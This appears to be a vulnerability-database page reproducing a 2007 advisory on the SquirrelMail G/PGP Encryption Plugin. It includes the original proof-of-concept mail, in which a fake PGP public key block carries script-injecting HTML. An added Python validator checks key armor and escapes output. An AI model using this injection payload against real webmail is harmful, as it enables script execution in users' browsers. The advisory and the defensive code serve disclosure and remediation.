Input and Access Validation Vulnerabilities in SquirrelMail G/PGP Encryption Plugin - exploit.company
vendor: G/PGP Encryption Plugin
by: Unknown
CVSS: 7.5 (HIGH)
Input and Access Validation
CWE: 20
Product Name: G/PGP Encryption Plugin
Affected Version From: 2
Affected Version To: 2.1
Patch Exists: NO
Related CWE:
CPE: a:squirrelmail_project:gpg_encryption_plugin:2.0 cpe:/a:squirrelmail_project:gpg_encryption_plugin:2.0.1 cpe:/a:squirrelmail_project:gpg_encryption_plugin:2.1
Metasploit:
Other Scripts:
Platforms Tested:
2007

Input and Access Validation Vulnerabilities in SquirrelMail G/PGP Encryption Plugin

The G/PGP encryption plugin for SquirrelMail is prone to an input-validation vulnerability and an access-validation vulnerability. Attackers can exploit these issues to inject arbitrary script code into public key data or to delete and overwrite arbitrary files with the privileges of the application.

Mitigation:

Update to a non-vulnerable version of the plugin. Additionally, input and access validation should be implemented in the plugin to prevent these vulnerabilities.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/26788/info

The G/PGP encryption plugin for SquirrelMail is prone to an input-validation vulnerability and an access-validation vulnerability.

Attackers can exploit these issues to inject arbitrary script code into public key data or to delete and overwrite arbitrary files with the privileges of the application.

SquirrelMail G/PGP Encryption Plugin 2.0, 2.0.1, and 2.1 are vulnerable; other versions may also be affected.

NOTE: One or more of these issues may already have been documented in the following BIDs, but we don't have enough information at this time to distinguish among them:

- 24782, SquirrelMail G/PGP Encryption Plug-in Unspecified Remote Command Execution Vulnerability
- 24828, SquirrelMail G/PGP Encryption Plug-in Multiple Unspecified Remote Command Execution Vulnerabilities
- 24874, SquirrelMail G/PGP Encryption Plug-in Multiple Remote Command Execution Vulnerabilities

Message-ID: <50453.10.0.0.1.1192345884.squirrel@mail.example.org>
Date: Sun, 14 Oct 2007 10:11:24 +0300 (EEST)
Subject: Test mail with SquirrelMail GPG 2.1 POC exploit
From: test@example.org

Test mail with SquirrelMail GPG 2.1 JavaScript exploit

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.4.6 (GNU/Linux)

"><script language="JavaScript">
<!--
alert("unsanitized javascript")
-->
</script>
<input type="hidden" name="hideout" value="
-----END PGP PUBLIC KEY BLOCK-----
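
The input validation called for under Mitigation, as an added example that is not part of the original advisory or the plugin's code: it rejects a key block whose armor body is not base64 (as in the proof-of-concept above) and HTML-escapes whatever is accepted before it is placed in a page. The function names and the sample are constructed for illustration; the armor layout and CRC-24 follow RFC 4880.

```python
import base64
import binascii
import html
import re

BEGIN = "-----BEGIN PGP PUBLIC KEY BLOCK-----"
END = "-----END PGP PUBLIC KEY BLOCK-----"
HEADER = re.compile(r"^[A-Za-z]+: [\x20-\x7e]*$")
B64_LINE = re.compile(r"^[A-Za-z0-9+/]{1,76}={0,2}$")
CRC_LINE = re.compile(r"^=[A-Za-z0-9+/]{4}$")
# Constructed sample modelled on the proof-of-concept: markup where base64 belongs.
POC_LIKE = f'{BEGIN}\nVersion: GnuPG v1.4.6 (GNU/Linux)\n\n"><script>alert(1)</script>\n{END}'

def crc24(data: bytes) -> int:
    """CRC-24 as defined in RFC 4880 section 6.1."""
    crc = 0xB704CE
    for byte in data:
        crc ^= byte << 16
        for _ in range(8):
            crc <<= 1
            if crc & 0x1000000:
                crc ^= 0x1864CFB
    return crc & 0xFFFFFF

def validate_key_block(text: str) -> bytes:
    """Return the decoded key bytes; raise ValueError if the armor is malformed."""
    lines = [ln.rstrip("\r") for ln in text.strip().split("\n")]
    if len(lines) < 4 or lines[0] != BEGIN or lines[-1] != END:
        raise ValueError("missing armor delimiters")
    inner = lines[1:-1]
    if "" not in inner:
        raise ValueError("no blank line after armor headers")
    split = inner.index("")
    headers, body = inner[:split], inner[split + 1:]
    if not all(HEADER.match(h) for h in headers):
        raise ValueError("unexpected armor header")
    checksum = body.pop() if body and CRC_LINE.match(body[-1]) else None
    if not body or not all(B64_LINE.match(ln) for ln in body):
        raise ValueError("body is not base64")
    try:
        raw = base64.b64decode("".join(body), validate=True)
    except binascii.Error as exc:
        raise ValueError("body is not base64") from exc
    if checksum and int.from_bytes(base64.b64decode(checksum[1:]), "big") != crc24(raw):
        raise ValueError("CRC-24 mismatch")
    return raw

def safe_attr(text: str) -> str:
    validate_key_block(text)              # reject malformed armor outright
    return html.escape(text, quote=True)  # headers may still carry quotes or tags
```

Structural validation alone is not enough, because armor header values are free-form text; the escaping step covers what the format check lets through.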